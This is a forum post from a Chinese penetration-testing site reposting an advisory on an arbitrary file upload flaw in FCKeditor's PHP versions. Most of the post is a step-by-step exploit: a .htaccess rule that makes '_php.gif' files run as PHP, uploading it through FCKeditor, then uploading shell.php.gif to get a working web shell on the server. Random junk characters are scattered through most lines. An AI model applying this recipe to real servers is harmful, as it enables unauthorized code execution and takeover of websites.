中国网络渗透测试联盟

标题: FCKeditor所有php版本Upload上传漏洞 [打印本页]

作者: admin    时间: 2013-10-27 17:25
标题: FCKeditor所有php版本Upload上传漏洞
FCKeditor所有php版本Upload上传漏洞
7 B' S, q/ D. D4 [! Z, @# R/ m作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
* U/ i- \& X$ b5 k减小字体 增大字体
% [; c1 [8 H' `% A: F; W[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability7 M# l9 c0 o8 X* N& H7 P, E
[+] Date: 2011' Y. F, O0 j3 S- Q2 G
[+] Author : sinesafe.cn
8 A- p8 K/ y% x[+] Website : WwW.sinesafe.cn
! Q9 ~& J. l3 i, d1 o———————————————————
: ~9 k) y9 Z7 p% R1.create a htaccess file:
- y+ B' m& w! x' g# R! ucode:( _2 _6 i' h3 Y& v0 c( V. |
<FilesMatch “_php.gif”>
: h1 T& ^: e' I8 B" rSetHandler application/x-httpd-php: K. Q6 v% a. T4 T/ @( r. U
</FilesMatch>
7 ^& a  c5 g- W" }. M8 ~: x% G7 V% K$ _$ J
2.Now upload this htaccess with FCKeditor.% K! A( `5 n2 Z$ U. o  s
+ D  W9 e, T- T
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html- R* U& H$ _; M" |

' _- ?6 v" m0 w0 n3 ]  l1 x6 Z' zhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html
% g; @0 \4 i6 l; f( [% A: M# Q; h4 ~  e: Q6 k
———————————————————————————————-# y8 v: p# u7 P4 ^8 i; h0 u6 u
3.Now upload shell.php.gif with FCKeditor.; Z, \, `. F! M% o: |6 }+ U" c% \+ \9 h; \
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 u% n& {: N( I, D
5.http://www.sinesafe.cn/anything/shell_php.gif
2 {* N5 H  x, Y0 U' {/ N, Y6.Now shell is available from server.

- k) o$ j6 c, f( r, B
0 j4 N- L5 C3 l" {8 F9 }5 B$ B' h1 g% e





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2